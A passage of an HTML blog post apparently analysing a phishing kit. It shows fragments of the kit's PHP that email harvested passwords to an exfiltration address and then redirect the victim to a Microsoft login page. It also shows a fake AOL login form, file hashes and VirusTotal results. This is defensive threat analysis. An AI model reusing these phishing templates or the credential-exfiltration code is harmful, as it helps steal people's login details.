    $message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#39;&lt;p&gt;Password: &#39;</span><span style="color:#f92672">.</span>$password<span style="color:#f92672">.</span><span style="color:#e6db74">&#39;&lt;p&gt;&lt;br&gt;&#39;</span>;
    $message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#39;&lt;/body&gt;&lt;/html&gt;&#39;</span>;
      <span style="color:#75715e">//send email
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">mail</span>($admin_email, $subject, $message, $headers )){
      <span style="color:#a6e22e">header</span>(<span style="color:#e6db74">&#39;Location: https://login.microsoftonline.com/common/oauth2&#39;</span>);
    }

}
      <span style="color:#75715e">//if &#34;email&#34; variable is not filled out, display the form
</span></code></pre></div><p>Considering that the exfiltration email is included also here, I assume that this is just the code of an old version of the kit that was left in the zip by mistake&hellip; But who knows? 🤷</p>
<h3 id="aolphp">aol.php</h3>
<p>If we manually navigate to <code>aol.php</code> with our browser, we see the following:</p>
<figure><img src="/images/posts/phishing-findings/ep1/aol.png"
         alt="aol.php"/><figcaption>
            <p>aol.php</p>
        </figcaption>
</figure>

<p>It seems another phishing page, this time for an app which has email capabilities.</p>
<p>Interacting with the page, we can notice that &lsquo;<em>Forgot Password?</em>&rsquo;, &lsquo;<em>Get a Free Username</em>&rsquo; and &lsquo;<em>Erase Hard Drive Junk Now</em>&rsquo; are not working, and the same applies to the &lsquo;<em>GET THE AOL APP</em>&rsquo; button. In the source code, they all have the <code>href</code> attribute equal to <code>javascript:void(0)</code>.</p>
<figure><img src="/images/posts/phishing-findings/ep1/aolstore.png"
         alt="AOL apps"/><figcaption>
            <p>AOL apps</p>
        </figcaption>
</figure>

<p>Here is the form:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html"><span style="color:#75715e">&lt;?php
</span><span style="color:#75715e">require_once(&#39;emailcode/email.php&#39;)
</span><span style="color:#75715e">?&gt;</span>
// SKIPPING NOT INTERESTING HTML
&lt;<span style="color:#f92672">form</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;needs-validation&#34;</span> <span style="color:#a6e22e">method</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;post&#34;</span> <span style="color:#a6e22e">action</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span> <span style="color:#a6e22e">novalidate</span>&gt;
    &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;form-group&#34;</span>&gt;
	&lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Email&#34;</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;form-control&#34;</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;validationCustom01&#34;</span> <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Email&#34;</span> <span style="color:#a6e22e">required</span>&gt;
	&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;invalid-feedback&#34;</span>&gt;
	    Enter Email Address
	&lt;/<span style="color:#f92672">div</span>&gt;
    &lt;/<span style="color:#f92672">div</span>&gt;
    &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;form-group&#34;</span>&gt;
	&lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;form-control&#34;</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;validationCustom02&#34;</span> <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Password&#34;</span> <span style="color:#a6e22e">required</span>&gt;
	&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;invalid-feedback&#34;</span>&gt;
	    Enter Password
	&lt;/<span style="color:#f92672">div</span>&gt;
    &lt;/<span style="color:#f92672">div</span>&gt;
    &lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;javascript:void(0);&#34;</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;forgotBtn&#34;</span>&gt;Forgot Password?&lt;/<span style="color:#f92672">a</span>&gt;
    &lt;<span style="color:#f92672">button</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;btn stepBtn&#34;</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;submit&#34;</span>&gt;Go to step 2&lt;/<span style="color:#f92672">button</span>&gt;
    &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;get-user&#34;</span>&gt;
	&lt;<span style="color:#f92672">span</span>&gt;&lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;javascript:void(0);&#34;</span>&gt;Get a Free Username&lt;/<span style="color:#f92672">a</span>&gt;&lt;/<span style="color:#f92672">span</span>&gt;
	&lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;javascript:void(0);&#34;</span>&gt;Erase Hard Drive Junk Now&lt;/<span style="color:#f92672">a</span>&gt;
    &lt;/<span style="color:#f92672">div</span>&gt;
&lt;/<span style="color:#f92672">form</span>&gt;
</code></pre></div><p>As for the other phishing pages of the kit, <code>emailcode/email.php</code> is imported also here. However, in this case, the <code>action</code> attribute of the form is empty; thus the php code will not be able to process the credentials of the victims.</p>
<p>The file is clear according to VirusTotal:</p>
<figure><img src="/images/posts/phishing-findings/ep1/vtaol.png"
         alt="aol.php on VirusTotal"/><figcaption>
            <p>aol.php on VirusTotal</p>
        </figcaption>
</figure>

<h2 id="what-about-the-other-files">What about the other files?</h2>
<p>We can check the VirusTotal detections of all the files using the sha256 hash:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ find . -type f | xargs sha256sum
e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b  ./js/bootstrap.min.js
2777abe0312e6b49428d5d7f7f42e43af620793f86f823f2e045968afbdddb63  ./images/microbg.jpg
2ebc65a696544b8d69ade5f136250a9548d4badf1b9ad459e63ff68e7a985c69  ./images/mail.png
17f02fdb590800c9a21e2b6166f5f22cc54952d58897f09d8e82bb9195bc2071  ./images/outlook.png
089aa7fa65a4038b4ab9130d083e6bcc24b0e33f5018984ef1463b8516bc7993  ./images/microsoftlogo.png
e298d32d99708f56d68ef9cd0c44ec85910a4df7552b5b2041fcaa48d5ee9742  ./images/webmaillogo.png
efaccc2b190fcce0f0ab41064d882fb4a701c6aed6b1035595a16138e32a0a50  ./images/officelogo.png
6adc34b6d4d872e313e0857063eac568a489ab092ff0f15834a2559043c9c1e2  ./images/mobile-img.png
c86c4a6731077f1994a8caeccb1fc06477ea35a5b6abbb4abde1d06b8ef9ff32  ./images/landing-devices-bg.jpg
4603ea1b2f9df0c9d4f2a253c550ffbaf27ea2cb53ecde4277b2acf9dde33979  ./images/Onedrive-logo.png
1500514adf9e666a3d20530815df881bc94812c6906a53bd4c216d051d18c372  ./images/office.png
7a2c0b0e1e16041b12dd1a7d18438ceb14063c980799baee1d55cb2f04892777  ./images/officebg.jpg
84f1d1ffdc036768ffeba1be92362dcf619e7ce6ec27500ab47844ed24fc4230  ./index.php
0b09beb179bd176c93c443175940777332cf57ac9e4487ea9088ae21e3c6d032  ./microsoft.php
8979f584623e4307a42bd008d755c35456af8cb96bec89dd4fbec47036e20184  ./css/style.css
2c0f3dcfe93d7e380c290fe4ab838ed8cadff1596d62697f5444be460d1f876d  ./css/bootstrap.min.css
c60bd69cdc08032d32898d4d3f7648a5370f15720b58b51af77a4ecd72799bc3  ./webmail.php
e5a35da055cf9b0cf6d4cfbd2d0e8be75ebdc56949740c5e767f12915e6174eb  ./office.php
085f5dfb1f89bd983c58e618a95bf7bdaa872bee4a126495ec3e7cf421bb9fc2  ./aol.php
3234d6c03d185864d6537178a4d1e44c5277c9115f11b07f9c5be0517ebc51a7  ./emailcode/email.php
d6083dcb3385f93916f63b6e50d28791a51842d38bd507bcad7b731b7b33009d  ./outlookcode/email.php
</code></pre></div><p>Here are the detections of <code>index.php</code>, <code>microsoft.php</code>, <code>office.php</code> and <code>webmail.php</code> on VirusTotal as of today.</p>
<figure><img src="/images/posts/phishing-findings/ep1/vtall.png"
         alt="index.php, microsoft.php, office.php and webmail.php on VirusTotal"/><figcaption>
            <p>index.php, microsoft.php, office.php and webmail.php on VirusTotal</p>
        </figcaption>
</figure>

<p>No matches were found for <code>emailcode/email.php</code> and <code>outlookcode/email.php</code>. All the other files were flagged as &lsquo;<em>Undetected</em>&rsquo; by all the engines on VirusTotal.</p>
<h2 id="conclusion">Conclusion</h2>
<p>In this post, we analyzed <code>u.zip</code>, a phishing kit found online which tricks victims into giving their credentials using 3 templates: one for Office365, one for Outlook and one for other email services (with a cPanel theme).</p>
<figure><img src="/images/posts/phishing-findings/ep1/diagram.png"
         alt="Schema of the phishing kit"/><figcaption>
            <p>Schema of the phishing kit</p>
        </figcaption>
</figure>

<p>The templates redirect the credentials to <code>emailcode/email.php</code>, which tries to gather additional information and writes them into an email, that is sent to the exfiltration email address. At the end of the execution, the victim is redirected to <code>login.microsoftonline.com</code>.</p>

      </div>


      <footer>
        


        
        
        
      </footer>
    </article>

    <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
  <script type="text/javascript" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/startup.js" id="MathJax-script"></script>
  <script>
    MathJax = {
      tex: {
        inlineMath: [
          ['$', '$'], ['\\(', '\\)']
        ],
        processEscapes: true,
        processEnvironments: true
      },
      options: {
        skipHtmlTags: ['script', 'noscript', 'style', 'textarea', 'pre']
      }
    };
  </script>
  </section>

	      </div>

	<footer class="footer">

<hr>

    <section class="container">
	
	<p>If you have comments or suggestions, feel free to ping me!</p>
	
	
	
	


<ul>
    
    
    <li>
	<a href="https://twitter.com/andpalmier/" aria-label="Twitter"  target="_blank" >
	    <i class="fab fa-twitter" aria-hidden="true"></i>
	</a>
    </li>
    
    
    
    <li>
	<a href="https://github.com/andpalmier/" aria-label="Github"  target="_blank" >
	    <i class="fab fa-github" aria-hidden="true"></i>
	</a>
    </li>
    
    
    
    <li>
	<a href="https://www.linkedin.com/in/andpalmier/" aria-label="LinkedIn"  target="_blank" >
	    <i class="fab fa-linkedin" aria-hidden="true"></i>
	</a>
    </li>
    
    
    
    <li>
	<a href="mailto:andpalmier@gmail.com" aria-label="Mail"  target="_blank" >
	    <i class="fas fa-envelope" aria-hidden="true"></i>
	</a>
    </li>
    
    
    
</ul>

    </section>
</footer>


	  </main>

    
      
        
        <script src="/js/dark-mode.min.aee9c8a464eb7b3534c7110f7c5e169e7039e2fd92710e0626d451d6725af137.js"></script>
      
    

	  

	  

	  

    </body>


</html>
